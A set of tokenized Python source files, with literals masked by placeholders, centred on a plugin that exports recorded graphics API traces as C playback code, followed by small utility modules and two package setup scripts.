write ( "<STR_LIT>" % self . project . config . name ) <EOL> except AttributeError : <EOL> sys . stdout . write ( "<STR_LIT>" % "<STR_LIT>" ) <EOL> self . colorizer . resetColor ( ) <EOL> command = raw_input ( ) <EOL> except KeyboardInterrupt : <EOL> break <EOL> except EOFError : <EOL> break <EOL> if not command : <EOL> continue <EOL> try : <EOL> self . execute ( command ) <EOL> except ExecutionError : <EOL> pass <EOL> except KeyboardInterrupt : <EOL> print <EOL> self . reportError ( "<STR_LIT>" ) <EOL> def reload ( self ) : <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( sys . modules ) ) <EOL> for plugin in self . plugins : <EOL> reload ( sys . modules [ plugin . __module__ ] ) </s>
<s> import re <EOL> import Plugin <EOL> from common import Task <EOL> import Trace <EOL> import Common <EOL> import StringUtils <EOL> import time <EOL> from common import OrderedDict <EOL> from common import Library <EOL> from common . Collections import DefaultDict <EOL> arrayTypeMap = { <EOL> Trace . ByteArrayValue : "<STR_LIT>" , <EOL> Trace . ShortArrayValue : "<STR_LIT>" , <EOL> Trace . IntegerArrayValue : "<STR_LIT:int>" , <EOL> Trace . LongArrayValue : "<STR_LIT>" , <EOL> Trace . FloatArrayValue : "<STR_LIT:float>" , <EOL> Trace . DoubleArrayValue : "<STR_LIT>" , <EOL> } <EOL> copyrightText = "<STR_LIT>" <EOL> class CSourceExporterPlugin ( Plugin . ExporterPlugin ) : <EOL> """<STR_LIT>""" <EOL> formatName = "<STR_LIT:c>" <EOL> def saveTrace ( self , trace , traceFile , <EOL> dataFileName = None , <EOL> dataFileFormat = "<STR_LIT>" , <EOL> frameMarkers = [ ] , <EOL> initFuncName = "<STR_LIT>" , <EOL> uninitFuncName = "<STR_LIT>" , <EOL> playFuncName = "<STR_LIT>" , <EOL> playFrameFuncName = "<STR_LIT>" , <EOL> frameFuncName = "<STR_LIT>" , <EOL> arrayPrefix = "<STR_LIT>" , <EOL> playerArgument = "<STR_LIT>" , <EOL> insertCopyright = True ) : <EOL> try : <EOL> library = self . analyzer . project . targets [ "<STR_LIT:code>" ] . library <EOL> config = self . analyzer . project . config <EOL> except ( AttributeError , KeyError ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def arrayId ( array ) : <EOL> assert isinstance ( array , Trace . Array ) <EOL> return ( array . __class__ , array . id ) <EOL> def objectId ( obj ) : <EOL> assert isinstance ( obj , Trace . Object ) <EOL> return "<STR_LIT>" % ( obj . cls . name . lower ( ) , obj . ns , obj . id ) <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> indent = "<STR_LIT:U+0020>" * <NUM_LIT:3> <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> values = [ ] <EOL> [ values . extend ( e . values . values ( ) ) for e in trace . 
events ] <EOL> arrays = OrderedDict ( [ ( arrayId ( v ) , v ) for v in reversed ( values ) if isinstance ( v , Trace . Array ) ] ) <EOL> if dataFileName : <EOL> assert dataFileName . endswith ( "<STR_LIT>" ) , "<STR_LIT>" <EOL> assert dataFileFormat in ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT>" <EOL> dataFile = open ( dataFileName , "<STR_LIT:w>" ) <EOL> else : <EOL> dataFile = None <EOL> arraySizes = dict ( [ ( a , <NUM_LIT:0> ) for a in arrays . keys ( ) ] ) <EOL> for value in values : <EOL> if isinstance ( value , Trace . Array ) : <EOL> a = arrayId ( value ) <EOL> arraySizes [ a ] = max ( len ( value ) , arraySizes [ a ] ) <EOL> classes = { } <EOL> objectTypes = { } <EOL> arrayTypes = { } <EOL> outValueObjects = set ( ) <EOL> arrayVariants = DefaultDict ( list ) <EOL> usePersistentArrays = False <EOL> def registerObject ( event , name , value ) : <EOL> if not value . cls in classes : <EOL> classes [ value . cls ] = { } <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> if not name or function . parameters [ name ] . isOut : <EOL> outValueObjects . add ( value ) <EOL> if objectId ( value ) in classes [ value . cls ] : <EOL> return <EOL> classes [ value . cls ] [ objectId ( value ) ] = value <EOL> for cType , nativeTypeName in library . typeMap . items ( ) : <EOL> if cType . name == value . cls . name : <EOL> objectTypes [ value ] = cType <EOL> break <EOL> else : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % value . cls . name ) <EOL> objectTypes [ value ] = value . cls . name <EOL> def registerArray ( event , name , value ) : <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> if name : <EOL> cType = function . parameters [ name ] . type <EOL> else : <EOL> cType = function . type <EOL> cType = Library . Type ( cType . name ) <EOL> realType = library . resolveType ( cType ) <EOL> if realType . name == "<STR_LIT>" : <EOL> cType = arrayTypeMap [ value . 
__class__ ] <EOL> arrayTypes [ arrayId ( value ) ] = cType <EOL> if isinstance ( value , Trace . ObjectArrayValue ) : <EOL> for obj in value : <EOL> registerObject ( event , name , obj ) <EOL> for event in trace . events : <EOL> if event . name . startswith ( "<STR_LIT>" ) : <EOL> usePersistentArrays = True <EOL> for name , value in event . values . items ( ) : <EOL> if isinstance ( value , Trace . Object ) : <EOL> registerObject ( event , name , value ) <EOL> elif isinstance ( value , Trace . Array ) : <EOL> registerArray ( event , name , value ) <EOL> for array in event . modifiedArrays : <EOL> a = arrayId ( array ) <EOL> if a in arrayTypes : <EOL> arrayVariants [ a ] . append ( array ) <EOL> task . step ( ) <EOL> if frameMarkers : <EOL> frameCount = len ( frameMarkers ) + <NUM_LIT:3> <EOL> else : <EOL> frameCount = len ( [ <NUM_LIT:1> for event in trace . events if self . analyzer . lookupFunction ( event ) . isFrameMarker ] ) + <NUM_LIT:3> <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( len ( trace . events ) , frameCount ) <EOL> if insertCopyright : <EOL> print >> traceFile , copyrightText <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" <EOL> print >> traceFile , indent * <NUM_LIT:3> , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> if "<STR_LIT>" in config : <EOL> for fileName in config [ "<STR_LIT>" ] : <EOL> f = open ( config . getRelativePath ( fileName ) ) <EOL> print >> traceFile , f . read ( ) <EOL> f . close ( ) <EOL> if dataFile : <EOL> if dataFileFormat == "<STR_LIT>" : <EOL> print >> dataFile , "<STR_LIT:#>" <EOL> print >> dataFile , "<STR_LIT>" % ( len ( trace . 
events ) , frameCount ) <EOL> print >> dataFile , "<STR_LIT:#>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> else : <EOL> print >> dataFile , "<STR_LIT:;>" <EOL> print >> dataFile , "<STR_LIT>" % ( len ( trace . events ) , frameCount ) <EOL> print >> dataFile , "<STR_LIT:;>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> dataFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> print >> traceFile , "<STR_LIT>" % ( objectTypes [ obj ] , objectId ( obj ) , objectTypes [ obj ] , obj . id ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> task . step ( ) <EOL> print >> traceFile , "<STR_LIT>" % len ( arrays ) <EOL> for i , array in enumerate ( arrays . values ( ) ) : <EOL> a = arrayId ( array ) <EOL> if usePersistentArrays : <EOL> l = arraySizes [ a ] <EOL> if not l : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % str ( a ) ) <EOL> l = <NUM_LIT:1> <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ a ] , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , i , l ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ a ] , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , i ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> arrayData = [ ] <EOL> arrayMap = { } <EOL> for variants in arrayVariants . values ( ) : <EOL> for array in variants : <EOL> for j , existingArray in enumerate ( arrayData ) : <EOL> if existingArray == array and existingArray . __class__ == array . __class__ : <EOL> arrayMap [ id ( array ) ] = j <EOL> break <EOL> else : <EOL> arrayMap [ id ( array ) ] = len ( arrayData ) <EOL> arrayData . append ( array ) <EOL> if not dataFile : <EOL> for i , array in enumerate ( arrayData ) : <EOL> if not len ( array ) : <EOL> continue <EOL> if isinstance ( array , Trace . 
ObjectArrayValue ) : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> continue <EOL> elif usePersistentArrays : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> print >> traceFile , indent , <EOL> qualifier = "<STR_LIT>" <EOL> format = "<STR_LIT:s>" <EOL> if len ( array ) : <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> format = qualifier = "<STR_LIT:f>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> format = qualifier = "<STR_LIT:d>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> format = qualifier = "<STR_LIT:l>" <EOL> for k , value in enumerate ( array ) : <EOL> value = ( "<STR_LIT>" % ( format , qualifier ) ) % value <EOL> if k != len ( array ) - <NUM_LIT:1> : <EOL> print >> traceFile , "<STR_LIT>" % value , <EOL> if not ( k + <NUM_LIT:1> ) % <NUM_LIT:8> : <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , indent , <EOL> else : <EOL> print >> traceFile , value <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> else : <EOL> for i , array in enumerate ( arrayData ) : <EOL> if not len ( array ) : <EOL> continue <EOL> if usePersistentArrays and not isinstance ( array , Trace . ObjectArrayValue ) : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> else : <EOL> print >> traceFile , "<STR_LIT>" % ( arrayTypes [ arrayId ( array ) ] , arrayPrefix , i , len ( array ) ) <EOL> if isinstance ( array , Trace . 
ObjectArrayValue ) : <EOL> continue <EOL> if dataFileFormat == "<STR_LIT>" : <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ShortArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ByteArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . IntegerArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> print >> dataFile , "<STR_LIT>" % ( typeCode , "<STR_LIT:U+002CU+0020>" . join ( map ( str , array ) ) ) <EOL> else : <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> print >> dataFile , "<STR_LIT>" % ( arrayPrefix , i ) <EOL> if isinstance ( array , Trace . FloatArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . DoubleArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . LongArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ShortArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . ByteArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> elif isinstance ( array , Trace . IntegerArrayValue ) : <EOL> typeCode = "<STR_LIT>" <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> prefix = "<STR_LIT>" % typeCode <EOL> for j in xrange ( <NUM_LIT:0> , len ( array ) , <NUM_LIT:8> ) : <EOL> values = array [ j : j + <NUM_LIT:8> ] <EOL> print >> dataFile , prefix , "<STR_LIT:U+002C>" . 
join ( map ( str , values ) ) <EOL> print >> traceFile , "<STR_LIT>" % ( initFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> def getObjectAttributeValue ( attr ) : <EOL> if isinstance ( attr , Trace . Array ) : <EOL> assert isinstance ( attr , Trace . ByteArrayValue ) <EOL> s = "<STR_LIT>" . join ( ( chr ( c ) for c in attr ) ) <EOL> s = s . replace ( "<STR_LIT:\r>" , "<STR_LIT>" ) <EOL> s = s . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) <EOL> s = s . rstrip ( "<STR_LIT:\x00>" ) <EOL> lines = s . split ( "<STR_LIT:\n>" ) <EOL> return "<STR_LIT:\n>" . join ( ( '<STR_LIT>' % l for l in lines ) ) <EOL> return str ( attr ) <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> cClass = library . classes . get ( obj . cls . name ) <EOL> if obj . attrs or ( not obj in outValueObjects and cClass and cClass . overridable ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . name , "<STR_LIT:U+002CU+0020>" . join ( obj . attrs . keys ( ) ) ) <EOL> if obj . attrs : <EOL> attrs = "<STR_LIT:U+002CU+0020>" . join ( map ( getObjectAttributeValue , obj . attrs . values ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , len ( obj . attrs ) + <NUM_LIT:1> , playerArgument , attrs ) <EOL> else : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( uninitFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> for objects in classes . values ( ) : <EOL> for obj in objects . values ( ) : <EOL> cClass = library . classes . get ( obj . cls . name ) <EOL> if obj . attrs or ( not obj in outValueObjects and cClass and cClass . overridable ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . 
name , playerArgument , objectId ( obj ) ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> task . finish ( ) <EOL> task = Task . startTask ( "<STR_LIT>" , "<STR_LIT>" , len ( trace . events ) ) <EOL> frameNumber = <NUM_LIT:0> <EOL> frameFunctions = [ "<STR_LIT>" % frameFuncName ] <EOL> activeArrays = dict ( [ ( a , None ) for a in arrays . keys ( ) ] ) <EOL> print >> traceFile , "<STR_LIT>" % ( frameFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> for event in trace . events : <EOL> function = self . analyzer . lookupFunction ( event ) <EOL> for obj in event . modifiedObjects : <EOL> if obj . attrs and obj . attrs != classes [ obj . cls ] [ objectId ( obj ) ] . attrs : <EOL> attrs = "<STR_LIT:U+002CU+0020>" . join ( map ( getObjectAttributeValue , obj . attrs . values ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( obj . cls . name , "<STR_LIT:U+002CU+0020>" . join ( obj . attrs . keys ( ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , obj . cls . name , len ( obj . attrs ) + <NUM_LIT:2> , playerArgument , objectId ( obj ) , attrs ) <EOL> classes [ obj . cls ] [ objectId ( obj ) ] . attrs = obj . attrs <EOL> for array in event . modifiedArrays : <EOL> a = arrayId ( array ) <EOL> if not id ( array ) in arrayMap : <EOL> continue <EOL> toArray = arrays . index ( a ) <EOL> fromArray = arrayMap [ id ( array ) ] <EOL> if activeArrays [ a ] == fromArray : <EOL> continue <EOL> if not len ( array ) : <EOL> continue <EOL> activeArrays [ a ] = fromArray <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> for i , obj in enumerate ( array ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , toArray , i , objectId ( obj ) ) <EOL> elif usePersistentArrays : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . 
lower ( ) , arrayPrefix , toArray , arrayPrefix , fromArray , len ( array ) ) <EOL> else : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , toArray , arrayPrefix , fromArray ) <EOL> args = [ ] <EOL> returnValue = None <EOL> for name , value in event . values . items ( ) : <EOL> valueType = name and function . parameters [ name ] . type or function . type <EOL> if value is None : <EOL> value = "<STR_LIT>" % valueType <EOL> elif isinstance ( value , Trace . Array ) : <EOL> if not valueType . isConstant ( ) and value in event . modifiedArrays : <EOL> a = arrayId ( value ) <EOL> activeArrays [ a ] = None <EOL> if not value . id : <EOL> value = "<STR_LIT>" % valueType <EOL> else : <EOL> a = arrayId ( value ) <EOL> value = "<STR_LIT>" % ( valueType , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , arrays . index ( a ) ) <EOL> elif isinstance ( value , Trace . Object ) : <EOL> value = str ( objectId ( value ) ) <EOL> elif isinstance ( value , Trace . UnknownPhrase ) : <EOL> value = "<STR_LIT>" % valueType <EOL> else : <EOL> value = StringUtils . decorateValue ( library , function , name , value ) <EOL> if isinstance ( value , Trace . FloatValue ) : <EOL> value = str ( value ) + "<STR_LIT:f>" <EOL> elif isinstance ( value , Trace . DoubleValue ) : <EOL> value = str ( value ) + "<STR_LIT:d>" <EOL> elif isinstance ( value , Trace . LongValue ) : <EOL> value = str ( value ) + "<STR_LIT:l>" <EOL> if name and library . isPointerType ( function . parameters [ name ] . type ) : <EOL> value = "<STR_LIT>" % ( valueType , value ) <EOL> try : <EOL> if name and "<STR_LIT>" in str ( library . resolveType ( function . parameters [ name ] . type ) ) and int ( value ) < <NUM_LIT:0> : <EOL> value = "<STR_LIT>" % ( function . parameters [ name ] . type , value ) <EOL> except ValueError : <EOL> pass <EOL> if event . 
name == "<STR_LIT>" and name and str ( value ) == "<STR_LIT:0>" : <EOL> value = "<STR_LIT>" <EOL> assert len ( str ( value ) ) <EOL> if name : <EOL> args . append ( str ( value ) ) <EOL> else : <EOL> returnValue = value <EOL> if not len ( args ) == len ( function . parameters ) : <EOL> self . analyzer . reportWarning ( "<STR_LIT>" % ( event . name , "<STR_LIT:U+002CU+0020>" . join ( args ) ) ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( event . name , "<STR_LIT:U+002CU+0020>" . join ( args ) ) <EOL> continue <EOL> returnObject = event . values . get ( None , None ) <EOL> if isinstance ( returnObject , Trace . Object ) : <EOL> print >> traceFile , indent , "<STR_LIT>" % objectId ( returnObject ) , <EOL> else : <EOL> print >> traceFile , indent , <EOL> args = "<STR_LIT:U+002CU+0020>" . join ( args ) <EOL> print >> traceFile , "<STR_LIT>" % ( event . name , args ) <EOL> for array in event . modifiedArrays : <EOL> if isinstance ( array , Trace . ObjectArrayValue ) : <EOL> for i , obj in enumerate ( array ) : <EOL> a = arrayId ( array ) <EOL> fromArray = arrays . index ( a ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( objectId ( obj ) , str ( arrayTypes [ a ] ) . lower ( ) , arrayPrefix , fromArray , i ) <EOL> if ( not frameMarkers and function . isFrameMarker ) or event in frameMarkers : <EOL> frameNumber += <NUM_LIT:1> <EOL> name = "<STR_LIT>" % ( frameFuncName , frameNumber ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % frameNumber <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( name , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> frameFunctions . append ( name ) <EOL> task . 
step ( ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playerArgument ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> print >> traceFile , indent , "<STR_LIT>" % ( initFuncName , playerArgument ) <EOL> for name in frameFunctions : <EOL> print >> traceFile , indent , "<STR_LIT>" % ( name , playerArgument ) <EOL> print >> traceFile , indent , "<STR_LIT>" % ( uninitFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playerArgument ) <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT>" % ( playFrameFuncName , playerArgument ) <EOL> print >> traceFile , "<STR_LIT:{>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:{>" <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( <NUM_LIT:0> , initFuncName , playerArgument ) <EOL> for i , name in enumerate ( frameFunctions ) : <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( i + <NUM_LIT:1> , name , playerArgument ) <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" % ( len ( frameFunctions ) + <NUM_LIT:1> , uninitFuncName , playerArgument ) <EOL> print >> traceFile , indent * <NUM_LIT:2> , "<STR_LIT>" <EOL> print >> traceFile , indent , "<STR_LIT:}>" <EOL> print >> traceFile , indent , "<STR_LIT>" <EOL> print >> traceFile , "<STR_LIT:}>" <EOL> if dataFile : <EOL> dataFile . close ( ) <EOL> task . finish ( ) </s>
<s> """<STR_LIT>""" <EOL> class DefaultDict ( dict ) : <EOL> def __init__ ( self , default = int ) : <EOL> self . default = default <EOL> dict . __init__ ( self ) <EOL> def __getitem__ ( self , name ) : <EOL> try : <EOL> return dict . __getitem__ ( self , name ) <EOL> except KeyError : <EOL> item = self . default ( ) <EOL> self [ name ] = item <EOL> return item <EOL> class DictProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dictionary ) : <EOL> self . dictionary = dictionary <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> return getattr ( self . dictionary , name ) <EOL> except AttributeError : <EOL> return self . dictionary [ name ] <EOL> def __getitem__ ( self , name ) : <EOL> return self . dictionary [ name ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT:[>" + "<STR_LIT:U+002CU+0020>" . join ( self . dictionary . keys ( ) ) + "<STR_LIT:]>" <EOL> def inverseDict ( d ) : <EOL> """<STR_LIT>""" <EOL> return dict ( zip ( d . values ( ) , d . keys ( ) ) ) <EOL> def flatten ( seq ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for item in seq : <EOL> if hasattr ( item , "<STR_LIT>" ) and not isinstance ( item , basestring ) : <EOL> result . extend ( flatten ( item ) ) <EOL> else : <EOL> result . append ( item ) <EOL> return result </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __revision__ = "<STR_LIT>" [ <NUM_LIT:11> : - <NUM_LIT:2> ] <EOL> import types <EOL> def _errmsg ( argname , ltd , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if errmsgExtra : <EOL> errmsgExtra = '<STR_LIT:\n>' + errmsgExtra <EOL> return "<STR_LIT>" % ( argname , ltd , errmsgExtra ) <EOL> def VerifyType ( arg , argname , legalTypes , ltd , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if type ( arg ) not in legalTypes : <EOL> m = _errmsg ( argname , ltd , errmsgExtra ) <EOL> raise TypeError ( m ) <EOL> def VerifyTypeClass ( arg , argname , legalTypes , ltd , klass , errmsgExtra = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> VerifyType ( arg , argname , legalTypes , ltd , errmsgExtra ) <EOL> if type ( arg ) == types . ClassType and not issubclass ( arg , klass ) : <EOL> m = _errmsg ( argname , ltd , errmsgExtra ) <EOL> raise TypeError ( m ) </s>
<s> from . core import * </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> default_app_config = '<STR_LIT>' <EOL> version_info = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , '<STR_LIT:a>' , <NUM_LIT:0> ) <EOL> def get_version ( ) : <EOL> "<STR_LIT>" <EOL> version = '<STR_LIT>' % ( version_info [ : <NUM_LIT:3> ] ) <EOL> if version_info [ <NUM_LIT:3> ] != '<STR_LIT:f>' : <EOL> import os <EOL> version = '<STR_LIT>' % version_info <EOL> dir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> hg_dir = os . path . normpath ( os . path . join ( dir , '<STR_LIT>' ) ) <EOL> if os . path . isdir ( os . path . join ( hg_dir , '<STR_LIT>' ) ) : <EOL> hg_rev = '<STR_LIT>' <EOL> try : <EOL> from mercurial import ui , hg , error <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> repo = hg . repository ( ui . ui ( ) , hg_dir ) <EOL> c = repo [ '<STR_LIT>' ] <EOL> hg_rev = '<STR_LIT>' % ( c . rev ( ) ) <EOL> except error . RepoError : <EOL> pass <EOL> version = '<STR_LIT>' % ( version , hg_rev ) <EOL> return version <EOL> __version__ = get_version ( ) </s>
<s> from setuptools import setup , find_packages <EOL> from setuptools . command . install_lib import install_lib as _install_lib <EOL> from distutils . command . build import build as _build <EOL> from distutils . cmd import Command <EOL> from djangobb_forum import get_version <EOL> class compile_translations ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> import os <EOL> from django . core . management import execute_from_command_line , CommandError <EOL> curdir = os . getcwd ( ) <EOL> forum_dir = os . path . realpath ( '<STR_LIT>' ) <EOL> os . chdir ( forum_dir ) <EOL> try : <EOL> execute_from_command_line ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except CommandError : <EOL> pass <EOL> finally : <EOL> os . chdir ( curdir ) <EOL> class build ( _build ) : <EOL> sub_commands = [ ( '<STR_LIT>' , None ) ] + _build . sub_commands <EOL> class install_lib ( _install_lib ) : <EOL> def run ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> _install_lib . run ( self ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = get_version ( ) , <EOL> description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> setup_requires = [ '<STR_LIT>' ] , <EOL> install_requires = open ( '<STR_LIT>' ) . readlines ( ) , <EOL> keywords = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> cmdclass = { '<STR_LIT>' : build , '<STR_LIT>' : install_lib , <EOL> '<STR_LIT>' : compile_translations } <EOL> ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> scripts = [ '<STR_LIT>' ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) </s>
